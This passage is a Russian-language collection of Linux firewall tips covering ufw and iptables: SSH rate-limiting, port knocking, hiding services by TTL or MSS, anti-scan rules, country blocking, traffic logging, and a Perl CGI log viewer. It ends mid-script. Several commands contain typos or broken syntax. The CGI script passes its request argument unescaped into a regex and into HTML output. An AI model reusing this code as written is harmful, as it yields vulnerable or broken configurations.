OpenSSH По умолчанию добавленные с помощью --add-new профили не будут обрабатываться файрволом. Рекомендуется вначале задать политику для новых профилей приложений: ufw app default allow|deny После чего все новые профили приложений будут добавляться в цепочку файрвола с указанной политикой. Использовать профили приложений можно также при создании обычных правил, например: # ufw allow OpenSSH Настройка профиля безопасности 1. Ограничение входящих подключений к FTP и Веб серверу Пример настройки файрвола для ситуации, когда необходимо заблокировать доступ к FTP и Веб серверу с адреса 192.168.100.100. В примере 192.168.1.11 - сервер на котором настраивается файрвол: # ufw deny proto tcp from 192.168.100.100 to 192.168.1.11 port 21,80 Правило добавлено # ufw status |Статус: активно |До Действие От ---- -------------------- 192.168.1.11 21,80/tcp DENY 192.168.100.100 Теперь при попытках подключения с хоста 192.168.100.100 к 21 или 80 порту хоста 192.168.1.11 клиент будет висеть пока не отвалится по таймауту. Удалим это правило и добавить аналогичное но с действием reject: # ufw delete deny proto tcp from 192.168.100.100 to 192.168.1.11 port 21,80 # ufw reject proto tcp from 192.168.100.100 to 192.168.1.11 port 21,80 Теперь при попытке подключения к 21 порту сервера удаленный клиент получит ответ Connection refused: $ telnet 192.168.1.11 21 Trying 192.168.1.11... telnet: Unable to connect to remote host: Connection refused Просканируем порты сервера: # nmap -sT 192.168.1.100 Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-28 22:56 EET Interesting ports on 192.168.1.100: Not shown: 992 closed ports PORT STATE SERVICE 21/tcp filtered ftp 22/tcp open ssh 80/tcp filtered http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2323/tcp open unknown 3128/tcp open squid-http 5900/tcp open vnc MAC Address: 00:18:F3:67:85:9E (Asustek Computer) Nmap done: 1 IP address (1 host up) scanned in 17.52 seconds 2. Ограничение исходящих подключений к указанному серверу Цель - запретить исходящие подключения с сервера к адресу 195.214.195.105: # ufw deny proto tcp to 195.214.195.105 3. Ограничение попыток авторизации по ssh # ufw limit 22 Произведем несколько попыток подключения к 22 порту сервера с введением заведомо неправильного пароля: $ ssh 192.168.1.100 user@192.168.1.100's password: Permission denied, please try again. ... $ ssh 192.168.1.100 ssh: connect to host 192.168.1.100 port 22: Connection refused Как видим после нескольких неудачных попыток файрвол блокирует IP адрес с которого исходят попытки подключения и в логах появится соответсвтующяя запись: Dec 28 22:59:13 fortress kernel: [273659.578463] [UFW LIMIT BLOCK] IN=eth0 OUT= MAC=00:18:f3:67:85:9e:00:26:5e:46:40:86:08:00 SRC=192.168.1.156 DST=192.168.1.100 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=3150 DF PROTO=TCP SPT=33783 DPT=22 WINDOW=5840 RES=0x00 SYN URGP=0 4. Логирование пакетов # ufw allow log 22 С помощью этого правила файрвол будет логировать пакеты установки соединиения по указанному 22 порту. В логах появятся следующие записи: Dec 28 23:04:18 fortress kernel: [273964.364715] [UFW ALLOW] IN=eth0 OUT= MAC=00:18:f3:67:85:9e:00:26:5e:46:40:86:08:00 SRC=192.168.1.156 DST=192.168.1.100 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=6564 DF PROTO=TCP SPT=58069 DPT=22 WINDOW=5840 RES=0x00 SYN URGP=0

Защита от трассировки маршрутов с помощью iptables (доп. ссылка 1) Автор: Владимир [комментарии]

Для того, чтобы затруднить исследование сети (локальной, DMZ и т.д.) можно заблокировать все пакеты с низким значением TTL. Пример блокирования пакетов с TTL меньше 5: iptables -A INPUT -p all -m ttl --ttl-lt 5 -j DROP или iptables -A FORWARD -p all -m ttl --ttl-lt 5 -j DROP

Активное противодействие сканированию портов (доп. ссылка 1) Автор: Владимир [комментарии]

Имеется сервер на нем ssh и web. Ниже приведён простой пример правил для блокирования на определенное время IP, обратившегося по неактивному номеру порта. iptables -P INPUT DROP iptables -P OUTPUT DROP iptables -P FORWARD DROP iptables -A INPUT -p all -i lo -j ACCEPT iptables -A OUTPUT -p all -o lo -j ACCEPT # любой пакет идущий на не 22,80 порт блокируется с ip адресом отправившим его на 120 секунд, # на 120 секунд блокируется все пакеты с этого ip, тем самым предотвращается сканирование портов iptables -A INPUT -m recent --rcheck --seconds 120 --name FUCKOFF -j DROP iptables -A INPUT -p tcp -m multiport ! --dports 22,80 -m recent --set --name FUCKOFF -j DROP iptables -A INPUT -p tcp --syn --dport 22 -j ACCEPT iptables -A INPUT -p tcp --syn --dport 80 -j ACCEPT iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A OUTPUT -p all -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT Теперь nmap -sV ip не выдаст ничего и если какой нибудь демон повесить на нестандартный порт, его будет не так просто обнаружить.

Защищаем SSH при помощи технологии "Port Knocking" (доп. ссылка 1) (доп. ссылка 2) Автор: Дмитрий [комментарии]

Реализация идеи динамического открытия доступа к 22 порту, при предварительном обращении telnet-ом на определенный сетевой порт (в примере 333 - открыть доступ и 334 - закрыть). Идея реализована средствами iptables, без привлечения дополнительных утилит и анализаторов логов. # Создаю цепочку с именем SSH iptables -N SSH # Правило по умолчанию в INPUT - DROP iptables -P INPUT DROP # Всё что пришло на 22 порт - в цепочку SSH iptables -A INPUT -p tcp --dport 22 -j SSH # Всё что пришло на 333 порт - в цепочку SSH iptables -A INPUT -p tcp --dport 333 -j SSH # Всё что пришло на 334 порт - в цепочку SSH iptables -A INPUT -p tcp --dport 334 -j SSH Разделения на цепочки сделано для своего удобства, от этого можно и отказаться. Теперь заполняем цепочку SSH. # Проверяем на наличие имени "SSH" у IP адреса устанавливающего соединение на 22 порт. # И если оно присутствует - то ACCEPT iptables -A SSH -p tcp -m state --state NEW -m tcp --dport 22 -m recent --rcheck --name SSH --rsource -j ACCEPT # Устанавливает имя SSH любому IP адресу с которого пришло новое TCP соединение на указанный порт. (порт 333) iptables -A SSH -p tcp -m state --state NEW -m tcp --dport 333 -m recent --set --name SSH --rsource -j DROP # Удаляет имя "SSH" с IP адреса установившего соединение на этот порт. (порт 334) iptables -A SSH -p tcp -m state --state NEW -m tcp --dport 334 -m recent --remove --name SSH --rsource -j DROP Насладимся итоговым результатом: Делаем: telnet ip_address_or_domain_name 333 После чего спокойно подключаемся по SSH. Когда прекращаем работу закрываем за собой 22 порт: telnet ip_address_or_domain_name 334

Методы сокрытия сервисов средствами iptables на примере sshd (доп. ссылка 1) (доп. ссылка 2) Автор: Владимир [комментарии]

Все действия в нижеизложенной статье выполнялись в debian 5, стандартными средствами. Методы предназначены для сокрытия сервисов. Ниже представлен простой шаблон правил: iptables -P INPUT DROP iptables -P OUTPUT DROP iptables -P FORWARD DROP iptables -A INPUT -p all -i lo -j ACCEPT iptables -A OUTPUT -p all -o lo -j ACCEPT ... ЗДЕСЬ НАШЕ ПРАВИЛО iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A OUTPUT -p all -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 1. Использование нестандартного диапазона tcp портов при установлении исходящего соединения. Идея заключается в установлении нестандартных номеров портов (для исходящих соединений) на КЛИЕНТСКОЙ СТОРОНЕ и фильтрации фаерволом на сервере при установлении соединения по этим портам, тем самый делая наш sshd не видимым для всех и доступным для нас :) Реализуем идею на практике: По умолчанию диапазон портов в linux равен от 32768 до 61000 (значения в различных дистрибутивах могут отличатся) посмотреть установленные значения можно командой cat /proc/sys/net/ipv4/ip_local_port_range 32768 61000 изменяем на, к примеру 30000 32500 (на клиентской ОС linux) echo "30000 32500">/proc/sys/net/ipv4/ip_local_port_range правило будет выглядеть так: iptables -A INPUT -p tcp --syn --sport 30000:32500 --dport 22 -j ACCEPT Правило означает: входящие подключение по протоколу tcp с флагами:FIN,SYN,RST,ACK/SYN с диапазона портов 30000:32500 на порт 22 разрешить 2. Фильтрация на основе ttl (время жизни пакета) Здесь можно пойти несколькими путями: 1) Суть заключается в привязывании к числу маршрутизаторов, через которые проходит пакет (ttl уменьшается на 1 при прохождении маршрутизатора), а так как количество маршрутизаторов в разных сетях разное, то получаем значение ttl равное числу по умолчанию минус число пройденных маршрутизаторов. В данном варианте на клиентской ОС ничего менять не будем. Выполним трассировку до нашего сервера, затем от значения ttl по умолчанию отнимем количество хостов до нашего сервера (default ttl - traceroute) получим значение ttl по которому будем принимать пакеты на стороне сервера. В linux значение ttl по умолчанию равно 64, посмотреть можно командой cat /proc/sys/net/ipv4/ip_default_ttl 64 Пример: выполняем трассировку tcptraceroute ya.ru ... 9 ya.ru (93.158.134.8) [open] 556.844 ms 474.811 ms * Всего в пути встретилось 9 узлов, значит к серверу придёт пакет с ttl=55 (64-9=55) правило будет выглядеть так: iptables -A INPUT -p tcp --syn --dport 22 -m ttl --ttl-eq 55 -j ACCEPT Правило означает: входящие подключение по протоколу tcp с флагами:FIN,SYN,RST,ACK/SYN на порт 22 с временем жизни 55 разрешить. Иногда бывает маршрут по которому проходящий пакет незначительно изменяется (к примеру, провайдер пускает трафик по разным канал в целях балансировки), следовательно и количество маршрутизаторов, по которым идёт пакет, тоже меняется, тогда на всякий случай добавим к правилу ttl +2 и ttl -2 Правило будет выглядеть так: iptables -A INPUT -p tcp --syn --dport 22 -m ttl --ttl-gt 52 -m ttl --ttl-lt 58 -j ACCEPT Правило означает: входящие подключение по протоколу tcp с флагами:FIN,SYN,RST,ACK/SYN на порт 22 с временем жизни больше 52 и меньше 58 (match TTL > 52 TTL match TTL < 58) разрешить 2) Второй вариант является продолжением первого, основное отличие в установлении на клиентской стороне нестандартного значения ttl, по которому на сервере будем фильтровать пакеты. Например ttl=80: echo "80" > /proc/sys/net/ipv4/ip_default_ttl При количестве маршрутизаторов 12, составим правило с запасом которое будет выглядеть так: iptables -A INPUT -p tcp --syn --dport 22 -m ttl --ttl-gt 65 -m ttl --ttl-lt 70 -j ACCEPT Правило означает: входящие подключение по протоколу tcp с флагами:FIN,SYN,RST,ACK/SYN на порт 22 с временем жизни больше 65 и меньше 70 (match TTL > 65 TTL match TTL < 70) разрешить 3. Фильтрация на основе mss (максимальный размер сегмента) Размер mss рассчитывается по формуле: mtu минус 40 байт mtu по умолчанию обычно равно 1500 байтам, итого значение mss по умолчанию равно 1460 байт Посмотреть mtu можно командой ifconfig При фильтрации по mss на сервере, на клиентской стороне потребуется лишь изменить mtu сетевого интерфейса (желательно немного уменьшить). Реализуем идею на практике: На клиентской стороне ставим mtu=1440 ifconfig eth0 mtu 1440 На сервере правило будет выглядеть так: iptables -A INPUT -p tcp --syn --dport 22 -m tcpmss --mss 1400 -j ACCEPT Правило означает: входящие подключение по протоколу tcp с флагами:FIN,SYN,RST,ACK/SYN на порт 22 с размером mss=1400 разрешить 4. Защита от установки пользователям сервера исходящих соединений во внешний мир. Например заблокируем возможность соединения пользователю с правами которого работает web сервер iptables -A INPUT -p tcp --syn --dport 80 -j ACCEPT iptables -A OUTPUT -p tcp -m owner --uid-owner 33 -m state --state NEW -j DROP В первой цепочки разрешаем входящие соединения на 80 порт по протоколу tcp, во второй запрещаем устанавливать новые исходящие соединения пользователю (uid 33) с правами которого работает web сервер.

Использование L7-filter в Linux (доп. ссылка 1) Автор: Сергей Яремчук [комментарии]

Проект l7-filter (http://l7-filter.sf.net) дает возможность Netfilter идентифицировать пакет на прикладном уровне данных, основываясь на его содержимом, и классифицировать пакеты по их назначению, без привязки к номеру порта. В настоящее время поддерживаются протоколы HTTP и FTP; P2P сети (Kazaa, BitTorrent, eDonkey2000, FastTrack); IM-системы (AIM/Jabber/IRC/MSN); VoIP/Skype; VPN; игры (Battlefield, CS, Doom3, WoW); файлы (exe, mp3) и даже сетевые черви - Code Red и Nimda. Проект предлагает две версии L7-filter: * Kernel version - развивается уже давно и хорошо протестирована, немного сложна в установке, не очень дружит с SMP-процессорами и позволяет использовать только самые простые регулярные выражения; * Userspace version - находится в ранней стадии развития, и, возможно, в будущем будет поддерживаться только эта версия, обладает большими возможностями по фильтрации, так как поддерживает весь спектр команд GNU grep. Несмотря на то, что userspace стабилен в работе, этот вариант не рекомендуют использовать на критических системах и для блокировки трафика. В дальнейшем рассмотрим установку kernel варианта l7-filter, который затем дополним IPP2P. Данный способ потребует пересборки ядра. Для успешного проведения сборки в твоей системе должны быть установлены пакеты build-essential, iptables, iptables-dev и linux-source. Берем настройки текущего ядра, которые будем использовать как базовые, и копируем текущую конфигурацию в /usr/src/linux: sudo cp /boot/config-`uname -r` /usr/src/linux/.config Получаем архив с патчами для ядра с сайта L7-filter, распаковываем его и переходим в каталог с сырцами ядра: tar xzvf netfilter-layer7-v2.21.tar.gz $ cd /usr/src/linux В архиве несколько патчей для разных версий ядер и iptables, нужно выбрать вариант для своего ядра: $ sudo patch -p1 < ../netfilter-layer7-v2.21/for_older_kernels/kernel-2.6.22-2.6.24-layer7-2.18.patch Теперь аналогично патчим iptables, выбрав также свою версию: $ cd ../iptables $ iptables -v iptables v1.3.8 $ sudo patch -p1 < ../netfilter-layer7-v2.21/iptables-1.3-for-kernel-2.6.20forward-layer7-2.21.patch $ sudo chmod +x extensions/.layer7-test Собираем iptables: $ make KERNEL_DIR=/usr/src/linux $ sudo make install Конфигурируем и компилируем ядро: $ sudo make menuconfig Переходим в "Networking - Networking option - Network packet filtering framework(Netfilter) - Core Netfilter Configuration", где активируем "Connection tracking flow accounting" и "Layer 7 match support". Cтавим фильтры протоколов, фактически они просто копируются в каталог /etc/l7-protocols: $ tar xzvf l7-protocols-2009-05-28.tar.gz $ cd l7-protocols-2009-05-28/ $ sudo make install После перезагрузки можно проверить работу фильтра. Команда "iptables -m layer7 --help" выдаст список параметров. Например, чтобы заблокировать BitTorrent, AIM и Skype, пишем: iptables -A FORWARD -m layer7 --l7proto bittorrent -j DROP iptables -A FORWARD -m layer7 --l7proto aim -j DROP iptables -A FORWARD -m layer7 --l7proto skypetoskype -j DROP iptables -A FORWARD -m layer7 --l7proto skypeout -j DROP То есть ищем в списке название протокола и производим нужное действие.

Корректировка вывода arptables-save в Debian Lenny Автор: аноним [комментарии]

Суть проблемы: в Debian Lenny arptables-save генерирует данные, синтаксически и семантически некорректные с точки зрения arptables-restore. Например, если в чистую таблицу filter добавить правило # arptables -A INPUT -s 10.128.0.100 -j DROP а затем вызвать arptables-save, получим # arptables-save *filter :INPUT ACCEPT :OUTPUT ACCEPT :FORWARD ACCEPT -A INPUT -j DROP -i any -o any -s 10.128.0.100 Попытавшись скормить это arptables-restore, увидим arptables v0.0.3.3: Can't use -o with INPUT Try 'arptables -h' or 'arptables --help' for more information. ERROR(line 5): Но даже удаление -o any не сильно исправит дело. Потому что останется -i any. С точки зрения arptables-restore, да и arptables, any ни разу не ключевое слово, а просто имя интерфейса. Почему arptables-save считает иначе - непонятно. Подводя итог: вывод arptables-save нужно фильтровать примерно таким образом: # arptables-save | sed -e 's/$-[io]$ any *//g' *filter :INPUT ACCEPT :OUTPUT ACCEPT :FORWARD ACCEPT -A INPUT -j DROP -s 10.128.0.100

Ограничение возможностей ssh туннеля при помощи iptables Автор: Avatar [комментарии]

Использование туннелей на основе ssh сейчас широко распространено. И многие используют его как универсальное решение для организации туннелей внутрь локальной сети для доступа к различным сервисам. И в связи с этим очень часто возникает вопрос "А как ограничить возможности такого туннеля". Например: есть компания, которая обслуживает ваш web сервер. Для выполнения этой работы требуется доступ к серверу web-server.dmz по портам 80 и 443. Решение: на сервере ssh, через который создаётся туннель, выполняем: 1) добавляем пользователя aaa 2) устанавливаем ему шелл /bin/false (или другой, только так чтобы он не мог залогиниться) 3) Добавляем правила iptables: iptables -A OUTPUT -d web-server.dmz -p tcp -m tcp --dport 80 -m owner --uid-owner aaa -j ACCEPT iptables -A OUTPUT -d web-server.dmz -p tcp -m tcp --dport 443 -m owner --uid-owner aaa -j ACCEPT iptables -A OUTPUT -m owner --uid-owner aaa -j REJECT

Скрипт для блокировки в iptables целых стран (доп. ссылка 1) Автор: Vivek Gite [комментарии]

Скрипт для организации блокировки диапазонов IP адресов в привязке к названию страны. Например, можно использовать для блокирования всех непрофильных сайту стран в моменты DDoS атаки или запретить приход почты для стран с которыми явно не ведется переписка. Список привязки IP к странам загружается с сайта http://www.ipdeny.com/ipblocks/data/countries #!/bin/bash ### Block all traffic from AFGHANISTAN (af) and CHINA (CN). Use ISO code ### ISO="af cn" ### Set PATH ### IPT=/sbin/iptables WGET=/usr/bin/wget EGREP=/bin/egrep ### No editing below ### SPAMLIST="countrydrop" ZONEROOT="/root/iptables" DLROOT="http://www.ipdeny.com/ipblocks/data/countries" cleanOldRules(){ $IPT -F $IPT -X $IPT -t nat -F $IPT -t nat -X $IPT -t mangle -F $IPT -t mangle -X $IPT -P INPUT ACCEPT $IPT -P OUTPUT ACCEPT $IPT -P FORWARD ACCEPT } # create a dir [ ! -d $ZONEROOT ] && /bin/mkdir -p $ZONEROOT # clean old rules cleanOldRules # create a new iptables list $IPT -N $SPAMLIST for c in $ISO do # local zone file tDB=$ZONEROOT/$c.zone # get fresh zone file $WGET -O $tDB $DLROOT/$c.zone # country specific log message SPAMDROPMSG="$c Country Drop" # get BADIPS=$(egrep -v "^#|^$" $tDB) for ipblock in $BADIPS do $IPT -A $SPAMLIST -s $ipblock -j LOG --log-prefix "$SPAMDROPMSG" $IPT -A $SPAMLIST -s $ipblock -j DROP done done # Drop everything $IPT -I INPUT -j $SPAMLIST $IPT -I OUTPUT -j $SPAMLIST $IPT -I FORWARD -j $SPAMLIST # call your other iptable script # /path/to/other/iptables.sh exit 0 Вместо последовательного добавления правил, для увеличения производительности, рекомендуется использовать систему ipset (http://ipset.netfilter.org/) или nfqueue (http://nfqueue.sf.net/) Использовать можно примерно так: #!/bin/sh iptables -F INPUT ipset -N spam ipmap cat block_country_net_list.txt | while read net; do ipset -A spam --network $net done iptables -A INPUT -m set --set spam src -j REJECT Другой эффективный вариант - использовать iptables модуль geoip (http://people.netfilter.org/peejix/geoip/), который не входит в базовую поставку iptables и требует установки patch-o-matic и загрузки дополнительной базы привязки к странам, например с http://www.maxmind.com/ Например, блокировка ICMP запросов из Франции, Италии и Испании будет выглядеть так: iptables -A OUTPUT -p icmp -m geoip --dst-cc FR,IT,ES -j REJECT

Поддержка TARPIT для RHEL 5/CentOS 5 Автор: Андрей [комментарии]

Для RHEL 5 / CentOS 5 исходники модуля TARPIT можно загрузить здесь: http://enterprise.bih.harvard.edu/pub/tarpit-updates/old-patch-o-matic TARPIT позволяет организовать коннект в пустоту (соединение не закрывается, но ничего не происходит). Я скачал 2.6.19 версию, собирается без проблем при наличии пакета kernel-devel и простого makefile: obj-m += ipt_TARPIT.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) all: make -C $(KDIR) M=$(PWD) modules clean: make -C $(KDIR) M=$(PWD) clean Чтобы при обновлении ядра модуль автоматом подхватывался, нужно зарегистрировать модуль через /sbin/weak-modules Пример использования: iptables -A INPUT -p tcp -m tcp -dport 80 -j TARPIT

Удаление iptables правил по их номерам [комментарии]

Для отображения порядковых номеров iptables правил в списке необходимо использовать опцию --line-numbers. Например, просмотрим содержимое таблицы трансляции и правила, влияющие на пересылку пакетов между интерфейсами: iptables -L POSTROUTING -t nat -n -v --line-numbers iptables -L FORWARD -n -v --line-numbers Удалим несколько записей по номеру: iptables -D FORWARD 55 iptables -t nat -D POSTROUTING 15 Цепочку следует явно указывать, так как номера уникальны только в рамках каждой цепочки. Удалять следует внимательно и по одному элементу, так как после удаления следующие номера сдвигаются! Т.е., если вы хотели удалить в списке строки 15 и 25, удалять нужно, начиная с большего номера, иначе 25 запись после удаления 15 сменит номер на 24.

Обход блокировки BitTorrent трафика, через отправку фиктивных RST пакетов (доп. ссылка 1) Автор: tuxtraining.com [комментарии]

Некоторые сетевые операторы, например Comcast, используют ПО Sandvine для нарушения работы BitTorrent. Принцип действия Sandvine в отправке клиенту поддельных RST пакетов, приводящих к прерыванию соединения. Простейший способ борьбы с подобной практикой блокирования - запретить прием пакетов с RST флагом: iptables -A INPUT -p tcp --dport 6883 --tcp-flags RST RST -j DROP где, 6883 - номер BitTorrent порта. Пример скрипта, оставляющего возможность входящих соединений только для BitTorrent: #!/bin/sh # Номер порта BitTorrent BT_PORT=6883 # Сброс настроек iptables iptables -F # Разрешаем трафик на loopback интерфейсе iptables -A INPUT -i lo -j ACCEPT # Молча отбрасываем RST пакеты iptables -A INPUT -p tcp --dport $BT_PORT --tcp-flags RST RST -j DROP # Пропускаем уже установленные входящие соединения iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # Разрешаем прием соединений для BitTorrent iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport $BT_PORT -j ACCEPT iptables -A INPUT -m state --state NEW -m udp -p udp --dport $BT_PORT -j ACCEPT # Все остальные входящие соединения блокируем iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited

Как заблокировать через iptables пакеты отправленные из определенной ОС (доп. ссылка 1) Автор: Evgeniy Polyakov [комментарии]

Модуль ost был написан для использования в iptables правилах результатов пассивного определения типа операционной системы, из которой был отправлен TCP SYN пакет. Загружаем исходные тексты модуля со страницы http://www.ioremap.net/archive/osf/ или ставим из patch-o-matic: В Makefile через переменную IPTABLES указываем путь к заголовочным файлам iptables (xtables.h и /lib/iptables или /lib/xtables в Debian). Собираем модуль xt_osf.ko: make Собираем библиотеку libipt_osf.so, после чего копируем ее в /lib/iptables или /lib64/iptables: make lib Собираем утилиты для загрузки сигнатур ОС и ведения лога (load, osfd, ucon_osf): make bin Загружаем список сигнатур: wget http://www.openbsd.org/cgi-bin/cvsweb/src/etc/pf.os Загружаем модуль ядра: insmod ./xt_osf.ko Загружаем сигнатуры: ./load ./pf.os /proc/sys/net/ipv4/osf Пример правила для занесения всех пересылок с участием Linux лог: iptables -I INPUT -j ACCEPT -p tcp -m osf --genre Linux --log 0 --ttl 2 Для блокирования внешних пакетов от Windows машин: iptables -j DROP -i INPUT -p tcp -m osg --genre Windows --ttl 2 При отправке с Windows в логе появится: ipt_osf: Windows [2000:SP3:Windows XP Pro SP1, 2000 SP3]: 11.22.33.55:4024 -> 11.22.33.44:139 Опции: --log - если в качестве аргумента передан 0, то помещать в лог все совпадения и неизвестные срабатывания, если 1, помещать только первое совпадение, 2 - только совпадения; --ttl - если 0, проверять только для пакетов внутри локальной сети, 1 - для внешней сети, 2 - не учитывать TTL.

Как увеличить размер таблицы контроля сессий ip_conntrack в Linux [комментарии]

Если ядро ругается "kernel: ip_conntrack: table full, dropping packet.", причину флуда (скорее всего вирус или сканирование портов) можно найти по списку /proc/net/ip_conntrack Если просто общая загрузка большая, увеличить размер таблицы можно через /proc/sys/net/ipv4/ip_conntrack_max Также можно увеличить размерность хэша через параметр hashsize модуля ip_conntrack: /etc/modules.conf: options ip_conntrack hashsize=N Более тонкий тюнинг можно произвести через переменные определенные в /proc/sys/net/ipv4/netfilter

Как вести лог блокировок в iptables и ipfw [комментарии]

Linux: - Перед правилом блокировки нужно вставить "log" правило: iptables -A FORWARD -p tcp -m tcp -s 192.168.0.0/16 --dport 25 \ -j LOG --log-level debug --log-prefix "outgoing mail" iptables -A FORWARD -p tcp -m tcp -s 192.168.0.0/16 --dport 25 -j DROP - Проверить запущены ли в системе klogd и syslogd. - Настроить /etc/syslog.conf на прием kern.debug логов: kern.=debug -/var/log/kernel/info FreeBSD: Добавить ключ log в ipfw, например: ipfw add 1000 deny log tcp from any to 192.168.10.10 22 via fxp0 ipfw add 1000 deny log logamount 0 tcp from any to 192.168.10.10 80 via fxp0 Для ведения логов ядро должно быть собрано с IPFIREWALL_VERBOSE или нужно выставить "sysctl -w net.inet.ip.fw.verbose=1". Далее проверить чтобы в /etc/syslog.conf было упоминание LOG_SECURITY: security.* /var/log/security Через параметр logamount передается число записей которые будет записано в лог, после превышения записи перестанут появляться в логе, до тех пор пока не будет вызвана команда "ipfw resetlog". Максимальное число сообщений можно также установить через sysctl net.inet.ip.fw.verbose_limit. Для отмены лимитирования на число записей, нужно установить атрибут в 0.

Статистика сетевых соединений через syslog и iptables Автор: umask [комментарии]

Часто недовольные пользователи приходят и просят дать им распечатку логов доступа в интернет. Отчасти это позволяет сделать squid, но только при прозрачном проксировании, да и то логи только по http-протоколу. На помощь приходит iptables и syslog. Настраиваем в syslog.conf добавление сообщений от ядра уровня debug (или уровня, который вам удобнее) в отдельный файл. Лучше всего хранить эти логи на отдельном разделе (их размер огромен! но проблему решает gzip - сжимает логи более чем в 10 раз). В моём syslog.conf была добавлена строка: kern.=debug -/var/log/access/access Желательно, что бы в уровень debug сообщений от ядра не поступало никакой другой информации, кроме информации от iptables. У меня так и получилось по умолчанию с уровнем debug. В rc.firewall было добавлено в самое начало: #LOG ALL (!!!). Beware!!! #FORWARD iptables -A FORWARD -m state --state NEW -j LOG --log-level debug \ --log-prefix 'FRWLL_FWD_NEW ' # --log-tcp-options --log-ip-options #iptables -A FORWARD -m state --state ESTABLISHED -j LOG --log-level debug \ # --log-prefix 'FRWLL_FWD_ESTBLSHD ' # --log-tcp-options --log-ip-options #iptables -A FORWARD -m state --state RELATED -j LOG --log-level debug \ # --log-prefix 'FRWLL_FWD_RLTD ' # --log-tcp-options --log-ip-options #iptables -A FORWARD -m state --state INVALID -j LOG --log-level debug \ # --log-prefix 'FRWLL_FWD_INVLD ' # --log-tcp-options --log-ip-options #INPUT iptables -A INPUT -m state --state NEW -j LOG --log-level debug \ --log-prefix 'FRWLL_INPT_NEW ' # --log-tcp-options --log-ip-options #iptables -A INPUT -m state --state ESTABLISHED -j LOG --log-level debug \ # --log-prefix 'FRWLL_INPT_ESTBLSHD ' # --log-tcp-options --log-ip-options #iptables -A INPUT -m state --state RELATED -j LOG --log-level debug \ # --log-prefix 'FRWLL_INPT_RLTD ' # --log-tcp-options --log-ip-options iptables -A INPUT -m state --state INVALID -j LOG --log-level debug \ --log-prefix 'FRWLL_INPT_INVLD ' # --log-tcp-options --log-ip-options Если раскомментировать все строки, то получиться лог с полной статистикой доступа - он будет очень большим. Поэтому в данном примере имеем лог только по установкам соединений и ошибочным соединениям в цепочках INPUT и FORWARD. Итак. В logrotate я добавил (/etc/logrotate.d/access): /var/log/access/access { sharedscripts compress rotate 45 daily postrotate /bin/killall -HUP syslogd endscript } Сжимаем логи каждый день. Храним статистику за последние 45 суток. Компрессия логов в моём случае дала значительный прирост производительности, поскольку шлюз достаточно мощный и скорость парсинга логов упиралась только в чтение с HDD. В итоге был написан простой скрипт на perl, выдающий статистику в более-менее удобоваримой форме. Вот и сам скрипт: ------------------------- #!/usr/bin/perl use CGI qw(:standard); use PerlIO::gzip; use Switch; ##Redefine before start: my $LOG_DIR="/var/log/access/"; my $LOG_FILENAME="access"; ##end my $IP, $FLAG; ## Params delimeter in request: "-" ($IP, $FLAG) = split(/-/, $ARGV[0]); ## if undefine IP or file log FLAG-number or FLAG is empty - parser exit: if(!defined($IP)||!defined($FLAG)||$FLAG==""){ print header; print start_html; print "Valid parameters required!"; print end_html; exit(1); } print header; print start_html("Stat for: $IP"); print "<h2>Stat for: $IP</h2><br/>", "\n<pre>"; switch($FLAG) { case "0" { open($FD, "<$LOG_DIR$LOG_FILENAME") or die "Cannot open current (0) log-file!<br> File does not exist or access not permitted!<br>"; while(<$FD>) { chomp; s/gw kernel://g; if(grep(/$IP/, $_)) { print $_, "<br>\n"; } } close($FD); } else { open($GZIP, "<:gzip(lazy)", "$LOG_DIR$LOG_FILENAME.$FLAG.gz") or die "Cannot open old (", $FLAG, ") log-file!<br> File does not exist or access not permitted!<br>"; while(<$GZIP>) { chomp; s/gw kernel://g; if(grep(/$IP/, $_)) { print $_, "<br>\n"; } } close($GZIP); } } print "</pre>\n"; print "<br><br>Access stat parser by \"umask at yandex dot ru\"<br>"; print end_html; ------------------------- Для работы скрипта необходимо установить модуль PerlIO-gzip. Найти ссылку на модуль можно на cpan.org. Доступ к статистике можно получить через браузер (скрипт рассчитан для работы как CGI): hostname.ru/cgi-bin/parse.pl?192.168.1.1-0 Аргумент понимаеться так: 192.168.1.1 - искомая подстрока. 0 - норме лог файла. В данном случае текущий (в который пока ещё записываются сообщения syslog). 1 - вчерашний, 2 - позавчерашний, 3 - 3 дня назад. ..... и т.д. Для меня данное решение оказалось удобным.

Скрипт для автоматизации настройки iptables фильтра для локальной сети (доп. ссылка 1) Автор: Константин Брызгалов [комментарии]

На разных машинах в моей локальной сети накопилась куча программ, которым нужен был выход в интернет напрямую. У каждой свой набор портов. Захотелось на входе иметь минимальную конфигурацию, описывающую ресурсы, а на выходе набор разрешающих правил для iptables. В основном были клиент-банки - поэтому и такая терминология в программе. А так вместо банка можно указывать любой ресурс в формате определенном в man iptables. Ограничения, недостатки: 1. использование количества портов для одного ресурса менее 16 2. нельзя указать диапазон портов через двоеточие как в iptables Оба легко устаняются: первое - есть пример в самом скрипте, второе через использование другого разделителя для записей на входе, проверку наличия ":" - использование другого формата вызова iptables. Мне это не нужно и код не хотел раздувать. #!/bin/bash #bkv 2005.10 #Дано: # Два списка: # Первый список из записей вида - банк:порты(через запятую) # Второй список из записей вида - клиент:банки(через запятую) #Найти: # Набор разрешающих правил iptables для forward #Примечания: # политика FORWARD по умолчанию - "запрещено все, что не разрешенно" # iptables поддерживает одновременное указание не более 15 портов #Решение: # Создадим отдельную цепочку, например, - CLIENTBANK # Сгенерируем необходимые правила и поместим их в цепочку CLIENTBANK # Обращения по всем портам из первого списка направим на обработку в CLIENTBANK # Перед выполнением все правила связаные с цепочкой CLIENTBANK удалим, чтобы не плодить # правила от многократного запуска itls="/sbin/iptables" #Подаем список на обработку awk #признак первого списка - первое поле BankPorts #признак второго списка - первое поле ClientBanks echo -e "\ BankPorts:smtp.mail.ru:25\n\ BankPorts:10.24.70.0/26:22,23\n\ BankPorts:pop.mail.ru:110\n\ BankPorts:bank4.ru:9999,888\n\ 